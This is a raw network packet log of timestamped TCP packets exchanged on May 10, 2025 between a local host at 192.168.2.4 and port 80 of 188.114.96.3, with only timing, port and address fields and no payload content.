                                                    May 10, 2025 08:05:40.312119961 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.312151909 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.312186003 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.312197924 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.312217951 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.312249899 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.312314987 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.312349081 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.312352896 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.312381983 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.312416077 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.312421083 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.312448978 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.312478065 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.312480927 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.312520027 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.312541962 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.312551975 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.312586069 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.312586069 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.312618017 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.312619925 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.312650919 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.312683105 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.312691927 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.312733889 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.312814951 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.312861919 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.312865973 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.312900066 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.312922955 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.312932968 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.312964916 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.312997103 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.312999010 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.313030005 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.313040018 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.313110113 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.458208084 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.458272934 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.458307028 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.458339930 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.458372116 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.458405018 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.458437920 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.458466053 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.458468914 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.458501101 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.458528996 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.458534002 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.458548069 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.458570004 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.458589077 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.458602905 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.458620071 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.458636045 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.458655119 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.458667994 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.458686113 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.458699942 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.458723068 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.458734035 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.458749056 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.458767891 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.458784103 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.458801031 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.458822012 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.458833933 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.458863974 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.458865881 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.458892107 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.458899021 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.458911896 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.458931923 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.458949089 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.458964109 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.458987951 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.458996058 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459023952 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.459028959 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459062099 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.459062099 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459089994 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.459096909 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459120989 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.459129095 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459153891 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.459162951 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459187031 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.459197998 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459229946 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.459230900 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459265947 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459270954 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.459297895 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459304094 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.459331036 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459362030 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459393024 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459424973 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459455013 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459486008 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459517956 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459547997 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459577084 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459606886 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459639072 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459671021 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459702015 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459733963 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459765911 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459796906 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459826946 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459856987 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459887981 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459893942 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.459919930 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.459934950 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.459970951 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.604149103 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.604204893 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.604238033 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.604300976 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.604306936 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.604332924 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.604365110 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.604398012 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.604430914 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.604434013 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.604461908 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.604473114 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.604496002 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.604517937 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.604528904 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.604556084 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.604563951 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.604595900 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.604598999 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.604628086 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.604645014 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.604660034 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.604669094 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.604692936 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.604723930 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.604727030 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.604758024 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.604762077 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.604789972 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.604820967 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.604850054 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.604855061 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.604887962 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.604919910 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.604921103 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.604952097 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.604953051 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.604985952 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605012894 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.605015993 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605046988 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605060101 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.605077982 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605104923 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.605110884 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605143070 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605175018 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605180979 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.605210066 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605220079 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.605242014 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605272055 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605284929 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.605284929 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.605304956 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605314016 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.605336905 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605365992 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.605366945 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605400085 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605403900 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.605432987 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605458021 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.605463982 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605496883 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605499983 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.605530024 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605557919 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.605567932 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605602026 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605632067 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605633974 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.605659962 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.605663061 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605695009 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605715990 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.605725050 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605758905 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.605761051 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605792999 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605823994 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605825901 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.605853081 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.605855942 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605887890 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605916023 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.605918884 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605947971 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.605950117 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.605983019 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606009960 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.606014013 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606045961 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606077909 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:40.606077909 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606111050 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606142998 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606173992 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606204987 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606235981 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606266975 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606297016 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606327057 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606357098 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606385946 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606416941 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606448889 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606478930 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606509924 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606539965 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606570005 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606600046 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606631041 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606661081 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606698036 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606728077 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606761932 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606791973 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.606822014 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.748903990 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.749663115 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.749699116 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.749752998 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.749789953 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.749820948 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.749855042 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.749887943 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.749921083 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.749954939 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.749984980 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750015974 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750046015 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750077009 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750108004 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750138044 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750171900 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750202894 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750235081 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750267029 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750299931 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750330925 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750360966 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750394106 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750426054 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750458002 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750490904 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750521898 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750551939 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750581980 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750614882 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750644922 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750679970 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750710011 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750741959 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750772953 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750803947 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750834942 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750865936 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750896931 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750926971 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750957012 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.750988007 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.751023054 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.751054049 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.751084089 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.751113892 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.751144886 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.751176119 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.751204967 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.751236916 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.751267910 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.751297951 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.751327991 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:40.751359940 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:41.758254051 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:41.758316994 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:41.758387089 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:41.784435034 CEST4972680192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:41.925437927 CEST8049726188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:43.564760923 CEST4972780192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:43.705861092 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:43.706057072 CEST4972780192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:43.706265926 CEST4972780192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:43.847354889 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:43.847412109 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:43.847440004 CEST4972780192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:43.847474098 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:43.847476006 CEST4972780192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:43.847520113 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:43.847537994 CEST4972780192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:43.847553015 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:43.847573042 CEST4972780192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:43.847585917 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:43.847614050 CEST4972780192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:43.847619057 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:43.847637892 CEST4972780192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:43.847651958 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:43.847671032 CEST4972780192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:43.847683907 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:43.847697973 CEST4972780192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:43.847719908 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:43.847738981 CEST4972780192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:43.847773075 CEST4972780192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:43.989051104 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:43.989077091 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:43.989092112 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:43.989106894 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:43.989120007 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:43.989134073 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:43.989141941 CEST4972780192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:43.989149094 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:43.989162922 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:43.989180088 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:43.989195108 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:43.989239931 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:43.989253998 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:44.130054951 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:44.319427967 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:44.319542885 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:44.319708109 CEST4972780192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:44.349045038 CEST4972780192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:44.444717884 CEST4972880192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:44.489834070 CEST8049727188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:44.585706949 CEST8049728188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:44.585860014 CEST4972880192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:44.586924076 CEST4972880192.168.2.4188.114.96.3
                                                    May 10, 2025 08:05:44.727705956 CEST8049728188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:44.727727890 CEST8049728188.114.96.3192.168.2.4
                                                    May 10, 2025 08:05:44.727742910 CEST8049728188.114.96.3192.168.2.4
